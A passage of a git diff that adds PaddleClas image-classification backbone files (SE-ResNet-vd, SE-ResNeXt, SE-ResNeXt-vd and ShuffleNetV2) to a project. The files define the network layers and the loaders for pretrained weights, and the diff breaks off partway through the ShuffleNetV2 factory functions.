filter_size=3, + stride=1, + act='relu', + name="conv1_3") + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + if layers >= 50: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block] * 4, + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + if_first=block == i == 0, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + else: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + conv_name = "res" + str(block + 2) + chr(97 + i) + basic_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BasicBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block], + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + if_first=block == i == 0, + name=conv_name)) + self.block_list.append(basic_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc6_weights"), + bias_attr=ParamAttr(name="fc6_offset")) + + def forward(self, inputs): + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def SE_ResNet18_vd(pretrained=False, use_ssld=False, **kwargs): + model = SE_ResNet_vd(layers=18, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SE_ResNet18_vd"], use_ssld=use_ssld) + return model + + +def SE_ResNet34_vd(pretrained=False, use_ssld=False, **kwargs): + model = SE_ResNet_vd(layers=34, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SE_ResNet34_vd"], use_ssld=use_ssld) + return model + + +def SE_ResNet50_vd(pretrained=False, use_ssld=False, **kwargs): + model = SE_ResNet_vd(layers=50, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SE_ResNet50_vd"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext.py new file mode 100644 index 0000000..8b7149e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext.py @@ -0,0 +1,364 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "SE_ResNeXt50_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNeXt50_32x4d_pretrained.pdparams", + "SE_ResNeXt101_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNeXt101_32x4d_pretrained.pdparams", + "SE_ResNeXt152_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNeXt152_64x4d_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None, + data_format='NCHW'): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False, + data_format=data_format) + bn_name = name + '_bn' + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance', + data_layout=data_format) + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + cardinality, + reduction_ratio, + shortcut=True, + if_first=False, + name=None, + data_format="NCHW"): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name='conv' + name + '_x1', + data_format=data_format) + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + groups=cardinality, + stride=stride, + act='relu', + name='conv' + name + '_x2', + data_format=data_format) + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + filter_size=1, + act=None, + name='conv' + name + '_x3', + data_format=data_format) + self.scale = SELayer( + num_channels=num_filters * 2 if cardinality == 32 else num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + reduction_ratio=reduction_ratio, + name='fc' + name, + data_format=data_format) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 2 + if cardinality == 32 else num_filters, + filter_size=1, + stride=stride, + name='conv' + name + '_prj', + data_format=data_format) + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + scale = self.scale(conv2) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=scale) + y = F.relu(y) + return y + + +class SELayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + reduction_ratio, + name=None, + data_format="NCHW"): + super(SELayer, self).__init__() + + self.data_format = data_format + self.pool2d_gap = AdaptiveAvgPool2D(1, data_format=self.data_format) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_sqz_weights"), + bias_attr=ParamAttr(name=name + '_sqz_offset')) + self.relu = nn.ReLU() + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.excitation = Linear( + med_ch, + num_filters, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_exc_weights"), + bias_attr=ParamAttr(name=name + '_exc_offset')) + self.sigmoid = nn.Sigmoid() + + def forward(self, input): + pool = self.pool2d_gap(input) + if self.data_format == "NHWC": + pool = paddle.squeeze(pool, axis=[1, 2]) + else: + pool = paddle.squeeze(pool, axis=[2, 3]) + squeeze = self.squeeze(pool) + squeeze = self.relu(squeeze) + excitation = self.excitation(squeeze) + excitation = self.sigmoid(excitation) + if self.data_format == "NHWC": + excitation = paddle.unsqueeze(excitation, axis=[1, 2]) + else: + excitation = paddle.unsqueeze(excitation, axis=[2, 3]) + out = input * excitation + return out + + +class ResNeXt(nn.Layer): + def __init__(self, + layers=50, + class_num=1000, + cardinality=32, + input_image_channel=3, + data_format="NCHW"): + super(ResNeXt, self).__init__() + + self.layers = layers + self.cardinality = cardinality + self.reduction_ratio = 16 + self.data_format = data_format + self.input_image_channel = input_image_channel + + supported_layers = [50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + supported_cardinality = [32, 64] + assert cardinality in supported_cardinality, \ + "supported cardinality is {} but input cardinality is {}" \ + .format(supported_cardinality, cardinality) + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, 1024] + num_filters = [128, 256, 512, + 1024] if cardinality == 32 else [256, 512, 1024, 2048] + if layers < 152: + self.conv = ConvBNLayer( + num_channels=self.input_image_channel, + num_filters=64, + filter_size=7, + stride=2, + act='relu', + name="conv1", + data_format=self.data_format) + else: + self.conv1_1 = ConvBNLayer( + num_channels=self.input_image_channel, + num_filters=64, + filter_size=3, + stride=2, + act='relu', + name="conv1", + data_format=self.data_format) + self.conv1_2 = ConvBNLayer( + num_channels=64, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv2", + data_format=self.data_format) + self.conv1_3 = ConvBNLayer( + num_channels=64, + num_filters=128, + filter_size=3, + stride=1, + act='relu', + name="conv3", + data_format=self.data_format) + + self.pool2d_max = MaxPool2D( + kernel_size=3, stride=2, padding=1, data_format=self.data_format) + + self.block_list = [] + n = 1 if layers == 50 or layers == 101 else 3 + for block in range(len(depth)): + n += 1 + shortcut = False + for i in range(depth[block]): + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] if i == 0 else + num_filters[block] * int(64 // self.cardinality), + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + cardinality=self.cardinality, + reduction_ratio=self.reduction_ratio, + shortcut=shortcut, + if_first=block == 0, + name=str(n) + '_' + str(i + 1), + data_format=self.data_format)) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1, data_format=self.data_format) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc6_weights"), + bias_attr=ParamAttr(name="fc6_offset")) + + def forward(self, inputs): + with paddle.static.amp.fp16_guard(): + if self.data_format == "NHWC": + inputs = paddle.tensor.transpose(inputs, [0, 2, 3, 1]) + inputs.stop_gradient = True + if self.layers < 152: + y = self.conv(inputs) + else: + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for i, block in enumerate(self.block_list): + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def SE_ResNeXt50_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=32, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SE_ResNeXt50_32x4d"], use_ssld=use_ssld) + return model + + +def SE_ResNeXt101_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SE_ResNeXt101_32x4d"], + use_ssld=use_ssld) + return model + + +def SE_ResNeXt152_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=64, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SE_ResNeXt152_64x4d"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext_vd.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext_vd.py new file mode 100644 index 0000000..b23b0d2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext_vd.py @@ -0,0 +1,321 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "SE_ResNeXt50_vd_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNeXt50_vd_32x4d_pretrained.pdparams", + "SE_ResNeXt50_vd_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNeXt50_vd_32x4d_pretrained.pdparams", + "SENet154_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SENet154_vd_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + is_vd_mode=False, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self.is_vd_mode = is_vd_mode + self._pool2d_avg = AvgPool2D( + kernel_size=2, stride=2, padding=0, ceil_mode=True) + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + bn_name = name + '_bn' + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + if self.is_vd_mode: + inputs = self._pool2d_avg(inputs) + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + cardinality, + reduction_ratio, + shortcut=True, + if_first=False, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name='conv' + name + '_x1') + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + groups=cardinality, + stride=stride, + act='relu', + name='conv' + name + '_x2') + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + filter_size=1, + act=None, + name='conv' + name + '_x3') + self.scale = SELayer( + num_channels=num_filters * 2 if cardinality == 32 else num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + reduction_ratio=reduction_ratio, + name='fc' + name) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 2 + if cardinality == 32 else num_filters, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name='conv' + name + '_prj') + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + scale = self.scale(conv2) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=scale) + y = F.relu(y) + return y + + +class SELayer(nn.Layer): + def __init__(self, num_channels, num_filters, reduction_ratio, name=None): + super(SELayer, self).__init__() + + self.pool2d_gap = AdaptiveAvgPool2D(1) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_sqz_weights"), + bias_attr=ParamAttr(name=name + '_sqz_offset')) + self.relu = nn.ReLU() + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.excitation = Linear( + med_ch, + num_filters, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_exc_weights"), + bias_attr=ParamAttr(name=name + '_exc_offset')) + self.sigmoid = nn.Sigmoid() + + def forward(self, input): + pool = self.pool2d_gap(input) + pool = paddle.squeeze(pool, axis=[2, 3]) + squeeze = self.squeeze(pool) + squeeze = self.relu(squeeze) + excitation = self.excitation(squeeze) + excitation = self.sigmoid(excitation) + excitation = paddle.unsqueeze(excitation, axis=[2, 3]) + out = paddle.multiply(input, excitation) + return out + + +class ResNeXt(nn.Layer): + def __init__(self, layers=50, class_num=1000, cardinality=32): + super(ResNeXt, self).__init__() + + self.layers = layers + self.cardinality = cardinality + self.reduction_ratio = 16 + supported_layers = [50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + supported_cardinality = [32, 64] + assert cardinality in supported_cardinality, \ + "supported cardinality is {} but input cardinality is {}" \ + .format(supported_cardinality, cardinality) + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [128, 256, 512, 1024] + num_filters = [128, 256, 512, + 1024] if cardinality == 32 else [256, 512, 1024, 2048] + + self.conv1_1 = ConvBNLayer( + num_channels=3, + num_filters=64, + filter_size=3, + stride=2, + act='relu', + name="conv1_1") + self.conv1_2 = ConvBNLayer( + num_channels=64, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv1_2") + self.conv1_3 = ConvBNLayer( + num_channels=64, + num_filters=128, + filter_size=3, + stride=1, + act='relu', + name="conv1_3") + + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + n = 1 if layers == 50 or layers == 101 else 3 + for block in range(len(depth)): + n += 1 + shortcut = False + for i in range(depth[block]): + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] if i == 0 else + num_filters[block] * int(64 // self.cardinality), + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + cardinality=self.cardinality, + reduction_ratio=self.reduction_ratio, + shortcut=shortcut, + if_first=block == 0, + name=str(n) + '_' + str(i + 1))) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc6_weights"), + bias_attr=ParamAttr(name="fc6_offset")) + + def forward(self, inputs): + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def SE_ResNeXt50_vd_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SE_ResNeXt50_vd_32x4d"], + use_ssld=use_ssld) + return model + + +def SE_ResNeXt101_vd_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SE_ResNeXt101_vd_32x4d"], + use_ssld=use_ssld) + return model + + +def SENet154_vd(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=64, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SENet154_vd"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/shufflenet_v2.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/shufflenet_v2.py new file mode 100644 index 0000000..d8bb69f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/shufflenet_v2.py @@ -0,0 +1,362 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import paddle +from paddle import ParamAttr, reshape, transpose, concat, split +from paddle.nn import Layer, Conv2D, MaxPool2D, AdaptiveAvgPool2D, BatchNorm, Linear +from paddle.nn.initializer import KaimingNormal +from paddle.nn.functional import swish + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ShuffleNetV2_x0_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ShuffleNetV2_x0_25_pretrained.pdparams", + "ShuffleNetV2_x0_33": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ShuffleNetV2_x0_33_pretrained.pdparams", + "ShuffleNetV2_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ShuffleNetV2_x0_5_pretrained.pdparams", + "ShuffleNetV2_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ShuffleNetV2_x1_0_pretrained.pdparams", + "ShuffleNetV2_x1_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ShuffleNetV2_x1_5_pretrained.pdparams", + "ShuffleNetV2_x2_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ShuffleNetV2_x2_0_pretrained.pdparams", + "ShuffleNetV2_swish": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ShuffleNetV2_swish_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +def channel_shuffle(x, groups): + batch_size, num_channels, height, width = x.shape[0:4] + channels_per_group = num_channels // groups + + # reshape + x = reshape( + x=x, shape=[batch_size, groups, channels_per_group, height, width]) + + # transpose + x = transpose(x=x, perm=[0, 2, 1, 3, 4]) + + # flatten + x = reshape(x=x, shape=[batch_size, num_channels, height, width]) + return x + + +class ConvBNLayer(Layer): + def __init__( + self, + in_channels, + out_channels, + kernel_size, + stride, + padding, + groups=1, + act=None, + name=None, ): + super(ConvBNLayer, self).__init__() + self._conv = Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + groups=groups, + weight_attr=ParamAttr( + initializer=KaimingNormal(), name=name + "_weights"), + bias_attr=False) + + self._batch_norm = BatchNorm( + out_channels, + param_attr=ParamAttr(name=name + "_bn_scale"), + bias_attr=ParamAttr(name=name + "_bn_offset"), + act=act, + moving_mean_name=name + "_bn_mean", + moving_variance_name=name + "_bn_variance") + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class InvertedResidual(Layer): + def __init__(self, + in_channels, + out_channels, + stride, + act="relu", + name=None): + super(InvertedResidual, self).__init__() + self._conv_pw = ConvBNLayer( + in_channels=in_channels // 2, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv1') + self._conv_dw = ConvBNLayer( + in_channels=out_channels // 2, + out_channels=out_channels // 2, + kernel_size=3, + stride=stride, + padding=1, + groups=out_channels // 2, + act=None, + name='stage_' + name + '_conv2') + self._conv_linear = ConvBNLayer( + in_channels=out_channels // 2, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv3') + + def forward(self, inputs): + x1, x2 = split( + inputs, + num_or_sections=[inputs.shape[1] // 2, inputs.shape[1] // 2], + axis=1) + x2 = self._conv_pw(x2) + x2 = self._conv_dw(x2) + x2 = self._conv_linear(x2) + out = concat([x1, x2], axis=1) + return channel_shuffle(out, 2) + + +class InvertedResidualDS(Layer): + def __init__(self, + in_channels, + out_channels, + stride, + act="relu", + name=None): + super(InvertedResidualDS, self).__init__() + + # branch1 + self._conv_dw_1 = ConvBNLayer( + in_channels=in_channels, + out_channels=in_channels, + kernel_size=3, + stride=stride, + padding=1, + groups=in_channels, + act=None, + name='stage_' + name + '_conv4') + self._conv_linear_1 = ConvBNLayer( + in_channels=in_channels, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv5') + # branch2 + self._conv_pw_2 = ConvBNLayer( + in_channels=in_channels, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv1') + self._conv_dw_2 = ConvBNLayer( + in_channels=out_channels // 2, + out_channels=out_channels // 2, + kernel_size=3, + stride=stride, + padding=1, + groups=out_channels // 2, + act=None, + name='stage_' + name + '_conv2') + self._conv_linear_2 = ConvBNLayer( + in_channels=out_channels // 2, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv3') + + def forward(self, inputs): + x1 = self._conv_dw_1(inputs) + x1 = self._conv_linear_1(x1) + x2 = self._conv_pw_2(inputs) + x2 = self._conv_dw_2(x2) + x2 = self._conv_linear_2(x2) + out = concat([x1, x2], axis=1) + + return channel_shuffle(out, 2) + + +class ShuffleNet(Layer): + def __init__(self, class_num=1000, scale=1.0, act="relu"): + super(ShuffleNet, self).__init__() + self.scale = scale + self.class_num = class_num + stage_repeats = [4, 8, 4] + + if scale == 0.25: + stage_out_channels = [-1, 24, 24, 48, 96, 512] + elif scale == 0.33: + stage_out_channels = [-1, 24, 32, 64, 128, 512] + elif scale == 0.5: + stage_out_channels = [-1, 24, 48, 96, 192, 1024] + elif scale == 1.0: + stage_out_channels = [-1, 24, 116, 232, 464, 1024] + elif scale == 1.5: + stage_out_channels = [-1, 24, 176, 352, 704, 1024] + elif scale == 2.0: + stage_out_channels = [-1, 24, 224, 488, 976, 2048] + else: + raise NotImplementedError("This scale size:[" + str(scale) + + "] is not implemented!") + # 1. conv1 + self._conv1 = ConvBNLayer( + in_channels=3, + out_channels=stage_out_channels[1], + kernel_size=3, + stride=2, + padding=1, + act=act, + name='stage1_conv') + self._max_pool = MaxPool2D(kernel_size=3, stride=2, padding=1) + + # 2. bottleneck sequences + self._block_list = [] + for stage_id, num_repeat in enumerate(stage_repeats): + for i in range(num_repeat): + if i == 0: + block = self.add_sublayer( + name=str(stage_id + 2) + '_' + str(i + 1), + sublayer=InvertedResidualDS( + in_channels=stage_out_channels[stage_id + 1], + out_channels=stage_out_channels[stage_id + 2], + stride=2, + act=act, + name=str(stage_id + 2) + '_' + str(i + 1))) + else: + block = self.add_sublayer( + name=str(stage_id + 2) + '_' + str(i + 1), + sublayer=InvertedResidual( + in_channels=stage_out_channels[stage_id + 2], + out_channels=stage_out_channels[stage_id + 2], + stride=1, + act=act, + name=str(stage_id + 2) + '_' + str(i + 1))) + self._block_list.append(block) + # 3. last_conv + self._last_conv = ConvBNLayer( + in_channels=stage_out_channels[-2], + out_channels=stage_out_channels[-1], + kernel_size=1, + stride=1, + padding=0, + act=act, + name='conv5') + # 4. pool + self._pool2d_avg = AdaptiveAvgPool2D(1) + self._out_c = stage_out_channels[-1] + # 5. fc + self._fc = Linear( + stage_out_channels[-1], + class_num, + weight_attr=ParamAttr(name='fc6_weights'), + bias_attr=ParamAttr(name='fc6_offset')) + + def forward(self, inputs): + y = self._conv1(inputs) + y = self._max_pool(y) + for inv in self._block_list: + y = inv(y) + y = self._last_conv(y) + y = self._pool2d_avg(y) + y = paddle.flatten(y, start_axis=1, stop_axis=-1) + y = self._fc(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ShuffleNetV2_x0_25(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=0.25, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x0_25"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x0_33(pretrained=False, use_ssld=False, **kwargs): + model = 